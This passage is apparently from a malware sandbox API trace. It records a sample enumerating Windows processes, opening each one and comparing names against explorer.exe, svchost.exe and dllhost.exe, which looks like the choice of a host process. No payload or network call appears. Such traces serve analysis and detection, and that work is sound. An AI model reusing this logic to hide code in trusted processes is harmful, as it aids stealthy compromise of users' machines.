lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0204.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0204.234] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0204.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0204.235] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0204.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0204.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0204.236] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.236] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0204.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0204.237] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0204.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0204.238] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0204.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0204.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0204.239] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0204.240] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0204.240] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.240] CloseHandle (hObject=0xd8) returned 1 [0204.240] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0204.240] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0204.240] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0204.240] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0204.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0204.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0204.241] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.241] CloseHandle (hObject=0xd8) returned 1 [0204.241] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0204.241] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0204.241] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0204.241] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0204.242] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0204.242] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0204.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0204.243] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.243] CloseHandle (hObject=0xd8) returned 1 [0204.243] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0204.243] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0204.243] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.244] CloseHandle (hObject=0xd8) returned 1 [0204.244] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0204.244] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0204.244] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.244] CloseHandle (hObject=0xd8) returned 1 [0204.244] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0204.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0204.245] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.245] CloseHandle (hObject=0xd8) returned 1 [0204.245] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0204.245] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0204.245] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.245] CloseHandle (hObject=0xd8) returned 1 [0204.245] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0204.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0204.246] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.246] CloseHandle (hObject=0xd8) returned 1 [0204.246] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0204.246] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0204.246] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.246] CloseHandle (hObject=0xd8) returned 1 [0204.246] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0204.247] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0204.247] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.247] CloseHandle (hObject=0xd8) returned 1 [0204.247] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0204.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0204.248] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.248] CloseHandle (hObject=0xd8) returned 1 [0204.248] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0204.248] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0204.248] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.248] CloseHandle (hObject=0xd8) returned 1 [0204.248] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0204.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0204.249] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.249] CloseHandle (hObject=0xd8) returned 1 [0204.249] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0204.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0204.249] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.249] CloseHandle (hObject=0xd8) returned 1 [0204.249] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0204.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0204.250] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.250] CloseHandle (hObject=0xd8) returned 1 [0204.250] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0204.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0204.250] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.251] CloseHandle (hObject=0xd8) returned 1 [0204.251] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0204.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0204.251] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.251] CloseHandle (hObject=0xd8) returned 1 [0204.251] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0204.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0204.252] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.252] CloseHandle (hObject=0xd8) returned 1 [0204.252] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0204.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0204.252] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.252] CloseHandle (hObject=0xd8) returned 1 [0204.252] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0204.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0204.253] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.253] CloseHandle (hObject=0xd8) returned 1 [0204.253] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0204.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0204.253] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.253] CloseHandle (hObject=0xd8) returned 1 [0204.253] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0204.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0204.254] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.254] CloseHandle (hObject=0xd8) returned 1 [0204.254] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0204.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0204.255] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.255] CloseHandle (hObject=0xd8) returned 1 [0204.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0204.255] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0204.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0204.256] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0204.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.257] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0204.257] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0204.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0204.258] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.258] CloseHandle (hObject=0xd8) returned 1 [0204.258] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0204.258] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0204.259] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.259] CloseHandle (hObject=0xd8) returned 1 [0204.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0204.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0204.259] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0204.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.259] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0204.259] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.260] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0204.260] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.260] CloseHandle (hObject=0xd8) returned 1 [0204.260] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0204.261] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.261] CloseHandle (hObject=0xd8) returned 1 [0204.261] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0204.261] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0204.261] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0204.261] CloseHandle (hObject=0xd8) returned 1 [0204.261] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, 